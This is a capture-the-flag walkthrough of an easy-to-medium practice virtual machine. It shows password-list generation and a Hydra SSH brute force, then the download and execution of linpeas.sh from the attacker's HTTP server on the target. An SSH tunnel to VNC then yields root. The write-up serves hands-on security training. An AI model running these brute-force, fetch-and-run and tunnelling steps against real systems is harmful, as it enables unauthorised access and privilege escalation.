Target Machine IP Address: My Machine IP Address:
Boot to Root
- To get user flag
- To get root flag
- To get root access
Level: Easy/Medium
If you know how to do ssh tunneling and know what is 'BrainFuck'. I think you are good to go.
You can download the machine from here.
Information Gathering & Scanning Process:
IP: (which spits out by machine and we do not need to search for it)
Since I know the machine IP address, I went ahead to do some manual assessment while running the following command (which helps to collects pretty much everything I required to know about this machine)
All those list of sub-directories were bogus but at the bottom, I noticed a strange character..

Initially I thought it was some kind of encrypted code but later I came to under it is another programming language called ‘BrainFuck’.
I used this link to convert the string.
Value we got:/alfa-support
Password Pattern: pet followed by 3 numerical digits.
<----------------------------- Let's keep all the above steps within stage 1. —————————–>
<-------------------------------------------------- Stage 2 Begins —————————–———————>
cat _full_tcp_nmap.txt | less
ftp username: anonymous password: anonymous ls cd thomas get milo.jpg
exiftool milo.jpg (didn't find anything useful)
From stage 1, we can conclude that the pet’s name is milo.
Password pattern is milo$i$j$k ($i$j$k represents three digits)
Let’s write a script to prepare a list of password.
vim script.sh
#!/usr/bin/bash for i in {0..9}; do for j in {0..9}; do for k in {0..9}; do echo "milo$i$j$k" >> password.txt done done done
chmod +x script.sh./script.sh
I tried a python script for the task 🙂
#!/usr/bin/python3 import sys with open('password.txt', 'w') as f: sys.stdout = f for i in range(1, 10): for j in range(1, 10): for k in range(1,10): print("milo"+str(i)+str(j)+str(k))
Brute Force SSH using Hydra
hydra -l thomas -P password.txt -s 65111 ssh://
username: thomas password: milo666
cat _full_tcp_nmap.txt | less
ssh thomas@ -p 65111

user_flag==>> M4Mh5FX8EGGGSV6CseRuyyskG (Solution 1)
scp -P 65111 thomas@ . #Saved Remote File (Keep in mind)
I tried to perform file, strings, cat, binwalk etc.. no use lol
I tried to evaluate the target machine with the help of linpea.sh program
Miscellaneous Steps :
On Kali Machine: cd /path-to-linpea.sh/ python3 -m http.server On Target or Victim Machine: cd /tmp wget chmod +x linpea.sh sh linpea.sh

Port 5901
We have password from the above information. Do you remember this file .remote_secret ?
vncviewer -passwd .remote_secret
I think I need to port forward or bind (like ssh tunneling). Let’s do some googling
ssh -p 65111 -L 5901:localhost:5901 thomas@
vncviewer -passwd .remote_secret localhost:5901
Viola!! We got the root flag as well as root access 🙂